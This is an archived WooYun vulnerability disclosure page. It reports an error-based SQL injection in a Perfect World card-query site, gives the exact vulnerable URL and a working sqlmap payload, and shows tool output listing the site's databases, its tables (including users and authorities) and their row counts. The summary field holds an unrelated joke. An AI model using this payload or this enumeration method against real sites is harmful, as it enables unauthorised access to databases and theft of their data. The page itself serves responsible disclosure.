当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0189603

漏洞标题:完美世界某站SQL报错注入

相关厂商:完美世界

漏洞作者: 路人甲

提交时间:2016-03-28 10:23

修复时间:2016-05-12 10:59

公开时间:2016-05-12 10:59

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-28: 厂商已经确认,细节仅向厂商公开
2016-04-07: 细节向核心白帽子及相关领域专家公开
2016-04-17: 细节向普通白帽子公开
2016-04-27: 细节向实习白帽子公开
2016-05-12: 细节向公众公开

简要描述:

今天中午室友买了黄瓜,没吃完剩了 好几根在桌上,午休起来发现大家都去 上自习了只剩我一个……于是,拿起黄瓜 往她们每人床上扔了根……下午回来,寝 室人异常的齐,进门时都幽怨地看着 我,然后被告知校领导来查寝了……

详细说明:

http://query.hex.wanmei.com/card/search?rarties=1,2&rule=1&type=

漏洞证明:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rule (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: rarties=1,2&rule=1' AND (SELECT 4701 FROM(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(4701=4701,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)and '3468'='3468&type=1
---
[11:00:35] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[11:00:35] [INFO] fetching database names
[11:00:35] [WARNING] reflective value(s) found and filtering out
[11:00:36] [INFO] the SQL query used returns 3 entries
[11:00:37] [INFO] retrieved: information_schema
[11:00:37] [INFO] retrieved: hex_card
[11:00:37] [INFO] retrieved: test
available databases [3]:
[*] hex_card
[*] information_schema
[*] test
---
Parameter: rule (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: rarties=1,2&rule=1' AND (SELECT 4701 FROM(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(4701=4701,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)and '3468'='3468&type=1
---
[11:01:29] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[11:01:29] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[11:01:29] [INFO] fetching tables for database: 'hex_card'
[11:01:29] [WARNING] reflective value(s) found and filtering out
[11:01:29] [INFO] the SQL query used returns 16 entries
[11:01:29] [INFO] retrieved: authorities
[11:01:30] [INFO] retrieved: card
[11:01:30] [INFO] retrieved: card_bak_20150604
[11:01:30] [INFO] retrieved: card_color
[11:01:30] [INFO] retrieved: card_group
[11:01:30] [INFO] retrieved: card_match_rule
[11:01:31] [INFO] retrieved: child_type
[11:01:31] [INFO] retrieved: color
[11:01:31] [INFO] retrieved: hero
[11:01:31] [INFO] retrieved: mast_type
[11:01:31] [INFO] retrieved: match_rule
[11:01:32] [INFO] retrieved: rarity
[11:01:32] [INFO] retrieved: suit
[11:01:32] [INFO] retrieved: suit_card
[11:01:32] [INFO] retrieved: users
[11:01:32] [INFO] retrieved: version
[11:01:33] [INFO] retrieved: 180
[11:01:33] [INFO] retrieved: 0
[11:01:33] [INFO] retrieved: 20
[11:01:33] [INFO] retrieved: 9
[11:01:33] [INFO] retrieved: 394
[11:01:34] [INFO] retrieved: 6
[11:01:34] [INFO] retrieved: 85
[11:01:34] [INFO] retrieved: 0
[11:01:34] [INFO] retrieved: 6
[11:01:34] [INFO] retrieved: 1
[11:01:34] [INFO] retrieved: 8
[11:01:35] [INFO] retrieved: 3
[11:01:35] [INFO] retrieved: 2
[11:01:35] [INFO] retrieved: 12
[11:01:35] [INFO] retrieved: 9
[11:01:35] [INFO] retrieved: 680
Database: hex_card
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| card | 680 |
| card_bak_20150604 | 394 |
| suit_card | 180 |
| child_type | 85 |
| hero | 20 |
| suit | 12 |
| authorities | 9 |
| users | 9 |
| mast_type | 8 |
| color | 6 |
| rarity | 6 |
| card_group | 3 |
| `version` | 2 |
| match_rule | 1 |
+-------------------+---------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-03-28 10:59

厂商回复:

感谢洞主对完美世界的关注,我们将尽快修补。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-03-28 10:49 | 木易 ( 普通白帽子 | Rank:319 漏洞数:64 | 不,,不要误会,我不是针对谁,我是说在座...)

    我是来看段子的

  2. 2016-03-28 12:47 | tangtanglove ( 路人 | Rank:20 漏洞数:7 | 一个对安全感兴趣的屌丝phper)

    好有深意的段子